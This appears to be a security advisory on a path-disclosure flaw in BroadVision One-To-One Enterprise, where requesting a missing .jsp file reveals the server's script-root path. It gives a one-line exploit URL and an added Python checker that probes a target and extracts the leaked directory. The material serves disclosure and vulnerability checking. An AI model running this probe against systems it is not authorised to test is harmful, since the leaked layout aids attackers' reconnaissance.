COMMAND

    BroadVision

SYSTEMS AFFECTED

    BroadVision One-To-One Enterprise (possibly all versions)

PROBLEM

    Ben Jurry found the following.  BroadVision One-To-One Enterprise is
    architected from the ground up using open industry standards, is
    inherently distributable, and is easily tailored to fit unique
    business needs.  The key benefits of Java technologies -- ease of
    programming, interoperability and connectivity -- are core to
    BroadVision's product philosophy.  Many web sites use this software,
    including GE Supply.

    BroadVision One-To-One Enterprise contains a vulnerability which
    reveals server information.  When a non-existent .jsp file is
    requested, the server's error message reveals the physical path at
    which it looked for the script, and with it the location of the
    script root on the server's filesystem:

        "Script /appl/bv1to1/bv1to1_var/script-root/login/benjurry.jsp failed, reason unknown"

    Exploit:

        http://target/benjurry.jsp

        Script /appl/bv1to1/bv1to1_var/script-root/login/benjurry.jsp failed, reason unknown
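    The following is an added checker, not part of the original advisory or
    of BroadVision's software.  It requests a random, non-existent .jsp name
    (so the hit cannot be a real or cached page), looks for the "Script ...
    failed, reason unknown" message quoted above, and strips the probe name
    off the disclosed path to recover the script root directory.  The
    function names, the regular expression and the constructed sample
    response body are this example's own assumptions; the only thing taken
    from the advisory is the wording of the error message.

```python
"""Check a BroadVision One-To-One Enterprise host for path disclosure
via a request for a non-existent .jsp (added example, not the advisory's code)."""
import re
import secrets
import sys
from urllib.error import HTTPError
from urllib.parse import urljoin
from urllib.request import Request, urlopen

# Pattern built from the error text quoted in the advisory:
#   "Script <absolute path>.jsp failed, reason unknown"
# (assumed regex; the product's exact message format may vary)
DISCLOSURE_RE = re.compile(r"Script\s+(/\S+?\.jsp)\s+failed,\s+reason unknown")


def probe_name():
    """Random .jsp name that is very unlikely to exist on the target."""
    return f"{secrets.token_hex(6)}.jsp"


def extract_disclosed_path(body):
    """Return the absolute server path leaked in an error body, or None."""
    m = DISCLOSURE_RE.search(body)
    return m.group(1) if m else None


def script_root(disclosed_path, requested_name):
    """Recover the script root by removing the probe name from the disclosed
    path.  Returns None if the path does not end with our probe, i.e. the
    match came from something other than our request."""
    if disclosed_path is None or not disclosed_path.endswith("/" + requested_name):
        return None
    return disclosed_path[: -len(requested_name) - 1]


def check_target(base_url, timeout=10.0):
    """Send the probe and return (probe_name, disclosed_path_or_None).
    The body is read whether the server answers 200 or an error status."""
    name = probe_name()
    req = Request(urljoin(base_url, name),
                  headers={"User-Agent": "bv1to1-path-disclosure-check"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except HTTPError as err:
        body = err.read().decode("utf-8", errors="replace")
    return name, extract_disclosed_path(body)


# Constructed sample response modelled on the message quoted in the advisory.
SAMPLE_BODY = (
    "<html><body>Script /appl/bv1to1/bv1to1_var/script-root/login/benjurry.jsp "
    "failed, reason unknown </body></html>"
)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Live check: python3 bvcheck.py http://target/
        name, path = check_target(sys.argv[1])
        if path:
            print(f"VULNERABLE: {path} (script root {script_root(path, name)})")
        else:
            print("no path disclosure in response")
    else:
        # Offline demonstration against the constructed sample body.
        path = extract_disclosed_path(SAMPLE_BODY)
        print(path)
        print(script_root(path, "benjurry.jsp"))
```

    Run with no arguments to see the parser work on the constructed sample;
    pass a base URL to probe a host.  Treat a hit as a finding in its own
    right: the disclosed directory layout is useful to an attacker for
    guessing file locations and for targeting later traversal or
    misconfiguration bugs, even though this message alone does not expose
    file contents.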

SOLUTION

    Nothing yet.